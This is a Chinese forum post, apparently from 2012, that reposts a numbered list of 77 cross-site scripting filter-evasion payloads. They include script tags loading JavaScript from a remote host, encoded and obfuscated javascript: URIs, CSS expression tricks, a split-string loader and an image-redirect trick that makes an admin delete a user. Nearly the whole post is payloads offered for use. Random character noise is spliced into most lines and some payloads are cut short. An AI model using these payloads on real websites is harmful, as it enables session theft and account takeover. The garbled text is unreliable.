貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
# i* U! `# Z0 F( Q* ]- e7 B5 n+ E: B* w8 Q
(1)普通的XSS JavaScript注入+ J* V4 g% f! r* t' {) G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% _5 P% _$ }+ Q Q, d& c9 ]3 e) A
+ Q# N( H, N* c( R- j
(2)IMG标签XSS使用JavaScript命令
# E, t) P \( G8 J) g- y9 I: y <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
\+ p' H! ^3 c3 s+ q' |6 G1 w9 c3 v0 ~2 {5 F. Z; G$ E" ]6 r: L
(3)IMG标签无分号无引号( }) j3 E+ Z+ w9 P1 q
<IMG SRC=javascript:alert(‘XSS’)>7 N+ N+ L3 }, _
9 b- J: Q7 `" Y/ ?, @; u
(4)IMG标签大小写不敏感; D# _% A7 k! S" f+ k
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" ?6 v0 F* U) K4 p1 [$ m0 k1 |8 i2 a1 ~8 p. D
(5)HTML编码(必须有分号)7 x: ]8 D0 _! O: ~ r
<IMG SRC=javascript:alert(“XSS”)>$ ]) \ m f( r: h
/ N7 Z" M8 ?7 u! _ (6)修正缺陷IMG标签
5 s" }+ H& r$ X <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: E9 O) F9 {, }+ m
& ?" \1 h$ z/ n* A
(7)formCharCode标签(计算器)
3 x, B! Q1 Q/ W7 ^4 n. N <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 T. k( s: f# O0 k
* @! h. {& N C4 O" u) E
(8)UTF-8的Unicode编码(计算器)
" x# T, I5 l! o; N _3 x <IMG SRC=jav..省略..S')>
( E# ?* s* P% ~2 v$ p+ _4 Q1 W' ~2 ]$ A( ]8 T# [, }
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
) u+ f) `5 X$ I/ M3 {; ?+ y <IMG SRC=jav..省略..S')>$ Q- y/ v% P3 i* ]/ }/ H
9 J. U/ c0 D6 y
(10)十六进制编码也是没有分号(计算器)3 j Q0 ]3 H! R' G$ u7 O* J
<IMG SRC=java..省略..XSS')>
1 ^! ]: d- f9 b- W# N. d, c: I
n, y# ~1 D6 U4 ]; W4 x3 x6 l (11)嵌入式标签,将Javascript分开
. y/ d- p- A3 w% P( Z( L <IMG SRC=”jav ascript:alert(‘XSS’);”>0 v4 ^4 b$ ^* i6 _' x
8 {9 ?9 F8 X# m+ d
(12)嵌入式编码标签,将Javascript分开# ]+ S$ t7 E" V) O) a* K
<IMG SRC=”jav ascript:alert(‘XSS’);”>; f5 b4 x& X9 V/ N; W& @, N
+ s$ K3 _& L7 t- o. w
(13)嵌入式换行符, {8 J3 a; {4 J' E( K6 {
<IMG SRC=”jav ascript:alert(‘XSS’);”>. z& {; ?! @. A* L" N1 k
& Q7 A6 D+ j5 r8 u8 D
(14)嵌入式回车* I( c& j/ ~! ~4 h
<IMG SRC=”jav ascript:alert(‘XSS’);”>! y V0 z; z+ ]
" ?3 p* B$ Q: F( d (15)嵌入式多行注入JavaScript,这是XSS极端的例子( A, F6 Q; Q) D+ B, S* I' Z- r
<IMG SRC=”javascript:alert(‘XSS‘)”>( f8 K7 B( F! N: _
2 E4 t, y) r- K" ?( f! C; c) g
(16)解决限制字符(要求同页面)
. S' w1 W8 ~1 z <script>z=’document.’</script># w( E8 q& U. }8 l# i5 S6 O
<script>z=z+’write(“‘</script># K2 c$ K' g4 J# g! j N/ s# `
<script>z=z+’<script’</script>
: Z+ y5 K) P- _$ p <script>z=z+’ src=ht’</script>7 ?, l2 j5 X2 r# q' E
<script>z=z+’tp://ww’</script>
$ s7 ^# f: ]: y0 Y0 A& }8 N# g <script>z=z+’w.shell’</script>
4 U2 b, n5 g" R7 G: g' G2 T <script>z=z+’.net/1.’</script>, A7 Z" o$ N' u3 f! r
<script>z=z+’js></sc’</script>/ D. j' r: p P
<script>z=z+’ript>”)’</script>, w8 h. X- d4 j- v, g$ Y5 i% R1 x
<script>eval_r(z)</script>
i) L! S5 { y" w* p+ y2 u) W
p0 X" c4 N5 l7 i; v. i2 L (17)空字符* F8 j: k6 O% F$ ]. T( ~
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- m0 s# z- {. f H& [% W# T
4 I/ X1 o( z! W/ K! X (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 Y' ~% k3 L8 S7 T! s# j& w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( K- a7 m8 r7 B2 d, _- O J. O* @, G# _' e
(19)Spaces和meta前的IMG标签' R# _, V% `7 u9 B0 ^- [4 `/ d
<IMG SRC=” � javascript:alert(‘XSS’);”>( |) Q t: h" }5 _9 |3 r
( K3 A! f# |" r1 o% q- ^5 d
(20)Non-alpha-non-digit XSS4 U6 y, X+ ^! F0 D2 K
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& A! J) r' V. S- A
3 k1 b+ u/ |& p; y( x! t (21)Non-alpha-non-digit XSS to 2
0 q, g1 T2 v9 M <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
+ P/ Y9 W, A- P, G0 B ^: m; s4 Q2 ^+ A2 T+ x% @! a5 @9 _: I
(22)Non-alpha-non-digit XSS to 34 K- }9 T! y8 @7 m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. g! z" ]: G: A! f- Q: m8 T2 r/ S5 q# ^
(23)双开括号
. q: A- [2 p2 P1 t <<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 }, L3 |7 c8 S/ q' e) r- N9 V1 ^( _6 A- \3 {' w7 `9 Y l7 T
(24)无结束脚本标记(仅火狐等浏览器)
8 ?5 D! Z) T9 q: R5 Q( t- o2 Q0 t# z <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; z; K# ~& q& ?8 }
- ]+ A; M# z& q (25)无结束脚本标记2) X/ Q* _9 X8 t5 @, j# T
<SCRIPT SRC=//3w.org/XSS/xss.js>
3 d/ ?) }6 G" i. x' a0 i# p3 B: I' P! R
(26)半开的HTML/JavaScript XSS
6 Z# ~9 U) P L2 s. i <IMG SRC=”javascript:alert(‘XSS’)”( b6 G- A$ w2 n6 s# `5 Y/ \8 E8 q8 d
8 L& \" e1 b/ V6 y% F4 ~
(27)双开角括号
, |% j; k" ?, [2 ?) V( ` <iframe src=http://3w.org/XSS.html <
! A$ z# Z# N7 Q( x: W9 l9 l, L: b8 q$ Y, H& [4 s1 `
(28)无单引号 双引号 分号
" M% Y" N. y3 K <SCRIPT>a=/XSS/
5 V q5 S. h: F& c alert(a.source)</SCRIPT>& H& \) L7 I# |9 R; W. u3 l
- ^, Z% }4 H5 ]! G+ h
(29)换码过滤的JavaScript
6 r* I# j5 d; D8 k \”;alert(‘XSS’);//. A r A( W+ N7 Z& p7 m1 a9 j
, Z+ v: x$ n& n, |: g (30)结束Title标签2 k4 ~- u9 ~9 ^1 d
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 X+ G6 p; E$ S
2 I7 T) `6 n. ~+ h. N/ r8 N (31)Input Image
; }* b3 U' w' L4 T8 E, _" m* c <INPUT SRC=”javascript:alert(‘XSS’);”>( W" B% z8 r2 y5 H( n8 C0 s
6 h: R3 J3 k5 G3 O! a& z (32)BODY Image
4 {' @' i, V6 C2 G# R <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- f! K5 r8 ~. @9 _) @( D7 q4 W: u3 ~4 @8 m* e+ {" y
(33)BODY标签& j* E3 g0 C3 H) P% o0 ?5 G
<BODY(‘XSS’)>9 U. z# y+ i2 y! U, U! F. I- G
$ i9 A- H; {" U) g5 @: v
(34)IMG Dynsrc- w, V9 s. F0 [, B* j3 @
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ B. r. @- v I. l
3 Y7 U" _: i9 y: `8 d8 H (35)IMG Lowsrc& N0 C( C! G! Y$ ^1 n5 w
<IMG LOWSRC=”javascript:alert(‘XSS’)”>7 v, M+ m7 y; w& o" f, H
1 ~4 k' Q+ h4 c! ^ (36)BGSOUND a. E! \, h4 E8 X+ B2 z+ @
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 |0 F" |4 W4 @% t% V: F, y1 I9 Y5 b* X$ Z
(37)STYLE sheet
- z% o' N& p6 i/ y6 r; E <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% R0 G( X" K/ _! R3 |0 t' e
" M) T' z9 R' z( Z) b (38)远程样式表
G* N2 X! [9 k+ f' a6 z, [ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 y' D$ c8 N# T( }1 s/ ]* Z
, A, W) J8 }1 V3 Y" q" f2 k/ p (39)List-style-image(列表式)1 g+ W8 D8 j; O8 E
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, \/ X/ K7 \( M) }5 t, A3 U: i, D0 y4 |. E) C" M, g {) i
(40)IMG VBscript
+ O$ m' b# r5 ^6 Y0 i# y/ j <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 O" `$ L+ y: D* Q$ C" ?% B- m! Y" o' W' y
(41)META链接url8 T8 V+ C* _4 L$ E1 D. \
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 p' S( J/ z1 r! g u. M) O" l
, l6 L9 v# X% Q! G* }! }/ k (42)Iframe
+ Z0 O0 q. N+ f: t& k <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" Z2 k8 Z; y7 j7 G' \9 ~
: y5 [4 c# C- X; x8 b) [5 L' u (43)Frame
' Z+ x( K$ q" Z1 l2 @9 X <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
1 A) T2 I+ v$ g3 y# u0 Q2 I6 G
& I. z/ j. R" g, O. J (44)Table$ p: {! u# n! v6 @0 o; D' |$ ]# r3 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
3 \( k* J0 T- A8 O! V
" M- J' R1 D9 }6 v% z (45)TD
' P- \$ G6 f. M% `% y# u <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% i! Z' N: X# p
: V3 h2 A( q( G. I/ P (46)DIV background-image
/ ]5 V9 A. S% I% i! B' p( R <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 |$ {" h: q6 |( K8 [1 W% T! w( ]- ~0 ]- \" v* z: y4 K
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 }- v- ~; L/ [* N" S3 [
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
+ ^1 x8 f( Y# f# S% I
- \" u" S8 L' r# ` (48)DIV expression
+ I B) {3 I2 K0 x; Z4 p <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% }% J) f8 l/ K$ j" i" R. O: |7 [$ v7 c5 O; ^0 Y$ R" T" ]; A; L# r
(49)STYLE属性分拆表达
6 A* n6 \. v* O: ~/ Q- n, t <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
1 }; W& e* m0 W$ ]2 f: P6 Z7 J' h
+ R& `8 H* C2 D# D- ?. b( Z (50)匿名STYLE(组成:开角号和一个字母开头)
2 H, k' C0 _6 W4 D1 B+ r3 f <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>( P7 p5 f1 p' y# j: q
2 h7 ^6 C+ `% x9 i/ I (51)STYLE background-image+ `3 |/ G, H, E& h$ C
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>6 i, \" p( Q& r8 p
7 |1 S4 x' R, F- [ (52)IMG STYLE方式
: {$ T1 w& f K6 x/ ~ v- t: R exppression(alert(“XSS”))’>
* W2 A5 v% D0 K7 e& ]* | ~
; j, {$ P; L4 F5 W (53)STYLE background' f$ |0 @2 a$ n* @! ?, ]5 L
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 d4 [6 `; O, R# f0 t! }- c
9 @( }0 e) j3 u4 X- X (54)BASE
. X. [( |5 A. L5 J1 R/ a9 C6 S <BASE HREF=”javascript:alert(‘XSS’);//”>
# H$ t0 P' D% K0 l6 i3 e
/ Y, k3 R+ b! p (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& v" x9 R; p V3 w3 u <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 v. d- d# [& F9 V8 ?' R
$ h3 G% x4 m9 l" o( D* O, G+ G (56)在flash中使用ActionScrpt可以混进你XSS的代码5 p, j* w4 ? z1 }
a=”get”;/ M/ {/ |* s7 v- a' O7 i7 {
b=”URL(\”";
* r( L: e/ _0 E1 J c=”javascript:”;
# ]2 ~# ~2 I. g/ ?2 b/ l5 P2 ~ d=”alert(‘XSS’);\”)”;
1 @4 o: \+ W0 h6 U, U/ {7 @6 E+ g eval_r(a+b+c+d);
5 b# p2 n7 h, u# @% r$ G8 ?8 B* e! C
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上% g0 X$ V- L! m5 |3 {$ a
<HTML xmlns:xss>4 P# X) f1 g# I8 a0 M6 F8 T6 l
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>! m% l% |: c4 `) c
<xss:xss>XSS</xss:xss>( W& V+ E! d! T7 |0 C! s5 q- a, O
</HTML>, Z. e$ d4 i: R+ P4 _
9 |' N: M) F( Y2 q' M (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
# B) k2 H# r7 Y0 ~% M <SCRIPT SRC=””></SCRIPT>
( a; T; P9 A A1 C+ z! `, `: \/ X, b0 M0 o
(59)IMG嵌入式命令,可执行任意命令
' N# [ X+ w6 Z' J4 `, |* _ <IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ {/ }) ]1 k6 ~0 L4 A% @( R3 |; {' V
(60)IMG嵌入式命令(a.jpg在同服务器)3 Y6 \+ G. d6 d8 J9 U. f% M7 r
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 y6 ] g: V# E; Y" o( Q) s8 Q
8 H- Z! t9 [: t" f. u& l( o6 B) l (61)绕符号过滤
. }2 \7 ~- S# W( @; Z) q& A1 s! J <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' q8 Z6 ?6 L& m5 ~. I# o* Z
~! V# v* |1 [5 A! R3 p7 X
(62)
/ x) N0 R2 t. g0 W# t <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, H1 G/ O; B+ ~% p4 ^2 {5 I; S: j( o& N. @# r2 G2 _- m
(63)
5 i2 [. O$ |* X+ U! M0 Z# y <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. G! N5 Z" i }- X
3 c7 b Z7 w3 {1 v' T (64); r/ b, n# H; H. W y3 l
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 g( U, D' o: o% g+ B( \6 F( ] s2 Y% J+ Y5 s: a9 w3 V
(65)
' \% |7 C. Z. d& } <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>* | G8 M+ S' o& w/ ~
9 q% ?( K p! y1 k( D5 W4 M- c( A (66)
5 w/ U2 | _) m; w$ A/ X' x* @ <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 w8 x# Y4 b6 U$ q, w3 M
1 |, ]; H9 ^! J2 q k (67)
* `0 O0 K+ n& V <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
5 b6 {0 A! J- v; v. ]9 B7 t/ G$ K$ {
(68)URL绕行
3 [+ E" C2 y# W' b4 ?! G. m <A HREF=”http://127.0.0.1/”>XSS</A>2 ^7 @+ m4 {$ J9 @0 T
& z; n9 Y2 N5 S
(69)URL编码5 b; D" ]: [" K8 t1 [( V
<A HREF=”http://3w.org”>XSS</A>, {# m" r$ z4 {4 z3 v4 A
$ x9 y3 Y; u, s" i0 i (70)IP十进制
% l5 ?9 B8 k. K) y: G1 N) l <A HREF=”http://3232235521″>XSS</A>* K! B( d4 v/ d" z K
6 _/ A, ^/ }2 f- c% i" Y, C (71)IP十六进制7 v- h3 l; J' ]: Y: o& f
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>1 Z0 v+ Z- L1 t* c
5 ?/ y! `/ U6 B$ } (72)IP八进制
! E# q) \9 o+ L9 i/ G9 n <A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 F8 K0 Y* g- Y. u: a3 m/ H2 X7 c$ |0 |7 n3 O3 P4 F& @
(73)混合编码
% O. X# y4 x+ g! J- D4 [5 [ <A HREF=”h3 x* F, i' X+ r) I& g+ L
tt p://6 6.000146.0×7.147/”">XSS</A>
/ W3 ?2 ]2 c: ^. F) l' ~, m
1 X2 H1 r: M" _ (74)节省[http:]
: p+ I7 }6 K- ]( x' x4 q' {& | <A HREF=”//www.google.com/”>XSS</A>* J: W, G ]1 K* v* z; ?
1 D/ O4 @: H% R3 J7 }! t5 l, n
(75)节省[www]
2 o- j3 q& F$ ?3 Z7 g6 B <A HREF=”http://google.com/”>XSS</A>7 t: B7 j$ t7 C; y: Q% @+ z
; s1 z5 y: f1 F. c `
(76)绝对点绝对DNS+ l% b2 R& M( I% A/ a5 @
<A HREF=”http://www.google.com./”>XSS</A>/ X/ q/ D9 x A- L: s
. c1 X$ w0 H g
(77)javascript链接
4 t1 ?! q& E* f <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对